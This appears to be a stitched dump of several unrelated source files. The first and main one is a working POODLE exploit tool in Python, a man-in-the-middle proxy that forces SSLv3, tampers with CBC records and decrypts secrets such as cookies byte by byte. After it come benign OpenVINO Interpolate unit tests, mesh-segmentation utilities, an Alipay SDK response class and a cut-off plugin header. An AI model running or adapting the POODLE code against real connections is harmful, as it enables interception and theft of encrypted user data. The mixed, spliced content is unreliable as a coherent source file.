import struct
import sys
import threading
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
MAJ = '\033[45m'
BLUE = '\033[44m'
ORANGE = '\033[43m'
CYAN = '\033[46m'
RED = '\033[41m'
GREEN = '\033[42m'
YELLOW = '\033[100m'
class Poodle():
def __init__(self):
self.length_block = 8
self.length_block_found = False
self.first_packet_found = False
self.find_block_length = False
self.first_packet = ''
self.ssl_header = ''
self.frame = ''
self.data_altered = False
self.decipherable = False
self.count = 0
self.decipher_byte = ""
self.secret = []
self.length_request = 0
self.current_block = args.start_block
self.secret_block = []
self.packet_count = 0
self.downgrade = False
self.length_previous_block = 0
def exploit(self, content_type, version, length, data):
# if data and the data is not a favicon check #7
if content_type == 23 and length > 24 and length >= len(self.first_packet):
traffic.favicon = True
# save the first packet, so we can generate a wrong HMAC when we want
# TODO : remove this and just alter the last byte of the packet when length of the
# block is found
if self.first_packet_found == False:
self.first_packet = data
self.ssl_header = struct.pack('>BHH', content_type, version, length)
self.first_packet_found = True
# find the length of a block and return an HMAC error when we find the length
if self.find_block_length == True:
if poodle.find_size_of_block(length) == 1:
return self.first_packet, self.ssl_header
# exploit exploit exploit
if self.length_block_found == True:
self.data_altered = True
if args.stop_block == 0:
self.total_block = (len(data)/self.length_block)-2
else:
self.total_block = args.stop_block
request = self.split_len(binascii.hexlify(data), 16)
request[-1] = request[self.current_block]
pbn = request[-2]
pbi = request[self.current_block - 1]
self.decipher_byte = chr((self.length_block-1) ^ int(pbn[-2:],16) ^ int(pbi[-2:],16))
sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1])))
sys.stdout.flush()
data = binascii.unhexlify(b''.join(request))
return data, struct.pack('>BHH', content_type, version, length)
def decipher(self):
self.secret_block.append(self.decipher_byte.encode("unicode_escape").decode("utf-8"))
sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1])))
sys.stdout.flush()
if len(self.secret_block) == self.length_block and self.current_block < (self.total_block):
print('')
self.secret += self.secret_block[::-1]
self.current_block = self.current_block + 1
self.secret_block = []
elif len(self.secret_block) == self.length_block and self.current_block == self.total_block:
# stop the attack and go to passive mode
self.secret += self.secret_block[::-1]
self.secret_block = []
poodle.length_block_found = False
print('\nStopping the attack...')
def decipher2(self):
print(self.decipher_byte.encode("unicode_escape").decode("utf-8"))
def split_len(self, seq, length):
return [seq[i:i+length] for i in range(0, len(seq), length)]
def find_size_of_block(self, length_current_block):
print(str(length_current_block), str(self.length_previous_block), str(length_current_block - self.length_previous_block))
if (length_current_block - self.length_previous_block) == 8 or (length_current_block - self.length_previous_block) == 16:
print("CBC block size " + str(length_current_block - self.length_previous_block))
self.length_block = length_current_block - self.length_previous_block
return 1
else:
self.length_previous_block = length_current_block
return 0
class Traffic():
def __init__(self):
self.protocol_all = { 768:[' SSLv3.0 ',bcolors.RED], 769:[' TLSv1.0 ',bcolors.GREEN], 770:[' TLSv1.1 ',bcolors.GREEN], 771:[' TLSv1.2 ',bcolors.GREEN], 772:[' TLSv1.3 ',bcolors.GREEN]}
self.protocol_current = ''
self.protocol_current_color = bcolors.GREEN
self.protocol_downgrade = 0
self.favicon = False
def info_traffic(self, color1, protocol, color2, status):
print(''.rjust(int(columns)-20) + color1 + bcolors.BOLD + protocol + color2 + bcolors.BOLD + status + bcolors.ENDC)
class ProxyTCPHandler(socketserver.BaseRequestHandler):
"""
The proxy respond to the CONNECT packet then just forward SSL packet to the server
or the client. When active mode is enabled, the proxy alter the encrypted data send
to the serveur
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((args.server, args.rport))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
connect = args.simpleProxy
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
try:
data = socket_server.recv(1024)
except socket.error as err:
running = False
break
# print 'Server -> proxy -> client'
if len(data) == 0:
running = False
break
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if poodle.data_altered == True:
poodle.count = poodle.count + 1
if content_type == 23:
# 23 -> Application data (no HMAC error)
poodle.decipher()
poodle.count = 0
# elif content_type == 21:
# 21 -> HMAC error
poodle.data_altered = False
poodle.packet_count += 1
if poodle.find_block_length == False and poodle.length_block_found == False and poodle.downgrade == False:
sys.stdout.write("\r[OK] -> packed send and receive %3s %s %s" % (poodle.packet_count, ''.rjust(int(columns)-56), traffic.protocol_current_color + traffic.protocol_current + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC))
# cursor at the end, tssss
sys.stdout.write("\r[OK] -> packed send and receive %3s" % (poodle.packet_count))
sys.stdout.flush()
if poodle.downgrade == True and traffic.protocol_current != ' SSLv3.0 ' and traffic.protocol_downgrade == 0:
print("Sending handshake failure")
self.request.send(binascii.unhexlify("15030000020228"))
traffic.protocol_downgrade = 1
poodle.downgrade == False
else:
# we send data to the client
self.request.send(data)
elif source is self.request:
if connect == True:
# print 'Client -> proxy'
data = self.request.recv(1024)
connect = False
if 'CONNECT' in str(data):
data = "HTTP/1.0 200 Connection established\r\n\r\n"
self.request.send(data.encode())
break
else:
# print 'Client -> proxy -> server'
try:
ssl_header = self.request.recv(5)
except struct.error as err:
break
if ssl_header == '':
running = False
break
try:
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
# print("client -> server", str(content_type), str(version), str(length))
try:
traffic.protocol_current = traffic.protocol_all[version][0]
traffic.protocol_current_color = traffic.protocol_all[version][1]
except KeyError as err:
# avoid error if the protocol is SSLv2.0
traffic.protocol_current = traffic.protocol_all[length][0]
traffic.protocol_current_color = traffic.protocol_all[length][1]
except struct.error as err:
# avoid error in chrome browser
return
if traffic.protocol_downgrade == 1 and content_type == 23:
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.YELLOW, ' downgrade ')
traffic.protocol_downgrade = 0
data = self.request.recv(length)
(data, ssl_header) = poodle.exploit(content_type, version, length, data)
data_full = ssl_header+data
# we send data to the server
poodle.packet_count += 1
socket_server.send(data_full)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Poodle Exploit by @mpgn_x64')
parser.add_argument('proxy', help='ip of the proxy')
parser.add_argument('port', type=int, help='port of the proxy')
parser.add_argument('server', help='ip of the remote server')
parser.add_argument('rport', type=int, help='port of the remote server')
parser.add_argument('--start-block', type=int, default=1, help='start the attack at this block')
parser.add_argument('--stop-block', type=int, default=0, help='stop the attack at this block')
parser.add_argument('--simpleProxy', type=int, default=0, help='Direct proxy, no ARP spoofing attack')
args = parser.parse_args()
rows, columns = os.popen('stty size', 'r').read().split()
# Create server and bind to set ip
poodle = Poodle()
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer((args.proxy, args.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
traffic = Traffic()
print('Proxy is launched on {!r} port {}'.format(args.proxy, args.port))
print('Passive mode enabled by default')
print('\nType help to show all command line, ' + bcolors.BLUE + bcolors.BOLD + 'passive' + bcolors.ENDC + ' mode is by default enabled\n')
#print(''.rjust(int(columns)-9) + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC)
while True:
try:
input_u = input(bcolors.BOLD + "> " + bcolors.ENDC)
if input_u == 'active':
print('Active mode enabled, waiting for data... sendAttack()')
poodle.find_block_length = False
poodle.length_block_found = True
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.MAJ, ' active ')
elif input_u == 'search':
print('Waiting for data... findlengthblock()')
poodle.find_block_length = True
poodle.length_block_found = False
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.ORANGE, ' search ')
elif input_u == 'downgrade':
print('Downgrade the protocol to SSLv3')
poodle.downgrade = True
elif input_u == "passive":
print('Passive mode enabled')
poodle.find_block_length = False
poodle.length_block_found = False
poodle.length_block = 8
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.BLUE, ' passive ')
elif input_u == "help":
print('~~~~Help command line~~~~\n')
print(bcolors.BOLD + 'downgrade' + bcolors.ENDC + ': downgrade the protocol to SSLv3 (not working on firefox)')
print(bcolors.BOLD + 'search' + bcolors.ENDC + ': find the block length (8 or 16). Use the command findlengthblock() in JS after launch this command')
print(bcolors.BOLD + 'active' + bcolors.ENDC + ': active mode alter the data. Use the command sendAttack() in the JS after launch this command ')
print(bcolors.BOLD + 'passive' + bcolors.ENDC + ': passive mode does not alter the data. Use the command reset() in the JS after launch this command ')
print(bcolors.BOLD + 'exit' + bcolors.ENDC + ': show deciphered byte and exit the program properly')
elif input_u == "exit":
print("Exiting...")
break
except KeyboardInterrupt:
print("Exiting...")
print("Stopping proxy... bye bye")
break
print("\n\033[32m{-} Deciphered plaintext\033[0m :", ('').join(poodle.secret))
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py | monroid/openvino | 2,406 | 12635736 | <filename>model-optimizer/unit_tests/extensions/ops/interpolate_test.py
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from extensions.ops.interpolate import Interpolate
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
graph_node_attrs_without_axes = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges_without_axes = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
graph_nodes_attrs = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'axes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'axes_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('axes', 'axes_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('axes_data', 'interpolate', {'in': 3}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
@generator
class TestInterpolateOp(unittest.TestCase):
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4])
])
def test_interpolate4_using_sizes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end)}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 1 / 3], [0, 2, 4, 6]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 0.3333333], [0, 2, 4, 6]),
])
def test_interpolate4_using_scales(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
])
def test_interpolate4_using_sizes_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'sizes'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 0.3333333]),
])
def test_interpolate4_using_scales_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
|
subdivnet/utils.py | 565353780/jittor-subdivnet | 145 | 12635739 | <reponame>565353780/jittor-subdivnet
import os
import json
from pathlib import Path
import numpy as np
import trimesh
import jittor as jt
from .mesh_tensor import MeshTensor
segment_colors = np.array([
[0, 114, 189],
[217, 83, 26],
[238, 177, 32],
[126, 47, 142],
[117, 142, 48],
[76, 190, 238],
[162, 19, 48],
[240, 166, 202],
])
def to_mesh_tensor(meshes):
return MeshTensor(jt.int32(meshes['faces']),
jt.float32(meshes['feats']),
jt.int32(meshes['Fs']))
def save_results(mesh_infos, preds, labels, name):
if not os.path.exists('results'):
os.mkdir('results')
if isinstance(labels, jt.Var):
labels = labels.data
results_path = Path('results') / name
results_path.mkdir(parents=True, exist_ok=True)
for i in range(preds.shape[0]):
mesh_path = mesh_infos['mesh_paths'][i]
mesh_name = Path(mesh_path).stem
mesh = trimesh.load_mesh(mesh_path, process=False)
mesh.visual.face_colors[:, :3] = segment_colors[preds[i, :mesh.faces.shape[0]]]
mesh.export(results_path / f'pred-{mesh_name}.ply')
mesh.visual.face_colors[:, :3] = segment_colors[labels[i, :mesh.faces.shape[0]]]
mesh.export(results_path / f'gt-{mesh_name}.ply')
def update_label_accuracy(preds, labels, acc):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
for k in range(len(acc)):
if (labels[i] == k).sum() > 0:
acc[k] += ((preds[i] == labels[i]) * (labels[i] == k)).sum() / (labels[i] == k).sum()
def compute_original_accuracy(mesh_infos, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
accs = np.zeros(preds.shape[0])
for i in range(preds.shape[0]):
raw_labels = mesh_infos['raw_labels'][i]
raw_to_sub = mesh_infos['raw_to_sub'][i]
accs[i] = np.mean((preds[i])[raw_to_sub] == raw_labels)
return accs
class ClassificationMajorityVoting:
def __init__(self, nclass):
self.votes = {}
self.nclass = nclass
def vote(self, mesh_paths, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
name = (Path(mesh_paths[i]).stem).split('-')[0]
if not name in self.votes:
self.votes[name] = {
'polls': np.zeros(self.nclass, dtype=int),
'label': labels[i]
}
self.votes[name]['polls'][preds[i]] += 1
def compute_accuracy(self):
sum_acc = 0
for name, vote in self.votes.items():
pred = np.argmax(vote['polls'])
sum_acc += pred == vote['label']
return sum_acc / len(self.votes)
class SegmentationMajorityVoting:
def __init__(self, nclass, name=''):
self.votes = {}
self.nclass = nclass
self.name = name
def vote(self, mesh_infos, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
name = (Path(mesh_infos['mesh_paths'][i]).stem)[:-4]
nfaces = mesh_infos['raw_labels'][i].shape[0]
if not name in self.votes:
self.votes[name] = {
'polls': np.zeros((nfaces, self.nclass), dtype=int),
'label': mesh_infos['raw_labels'][i],
'raw_path': mesh_infos['raw_paths'][i],
}
polls = self.votes[name]['polls']
raw_to_sub = mesh_infos['raw_to_sub'][i]
raw_pred = (preds[i])[raw_to_sub]
polls[np.arange(nfaces), raw_pred] += 1
def compute_accuracy(self, save_results=False):
if save_results:
if self.name:
results_path = Path('results') / self.name
else:
results_path = Path('results')
results_path.mkdir(parents=True, exist_ok=True)
sum_acc = 0
all_acc = {}
for name, vote in self.votes.items():
label = vote['label']
pred = np.argmax(vote['polls'], axis=1)
acc = np.mean(pred == label)
sum_acc += acc
all_acc[name] = acc
if save_results:
mesh_path = vote['raw_path']
mesh = trimesh.load_mesh(mesh_path, process=False)
mesh.visual.face_colors[:, :3] = segment_colors[pred[:mesh.faces.shape[0]]]
mesh.export(results_path / f'pred-{name}.ply')
mesh.visual.face_colors[:, :3] = segment_colors[label[:mesh.faces.shape[0]]]
mesh.export(results_path / f'gt-{name}.ply')
if save_results:
with open(results_path / 'acc.json', 'w') as f:
json.dump(all_acc, f, indent=4)
return sum_acc / len(self.votes)
|
alipay/aop/api/response/AlipayOpenAppAppcontentPoiSyncResponse.py | antopen/alipay-sdk-python-all | 213 | 12635748 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenAppAppcontentPoiSyncResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenAppAppcontentPoiSyncResponse, self).__init__()
self._alipay_poi_id = None
@property
def alipay_poi_id(self):
return self._alipay_poi_id
@alipay_poi_id.setter
def alipay_poi_id(self, value):
self._alipay_poi_id = value
def parse_response_content(self, response_content):
response = super(AlipayOpenAppAppcontentPoiSyncResponse, self).parse_response_content(response_content)
if 'alipay_poi_id' in response:
self.alipay_poi_id = response['alipay_poi_id']
|
plugins/Operations/Misc/emulate_code_dialog.py | nmantani/FileInsight-plugins | 120 | 12635778 | <filename>plugins/Operations/Misc/emulate_code_dialog.py
#
# Emulate code - Emulate selected region as an executable or shellcode
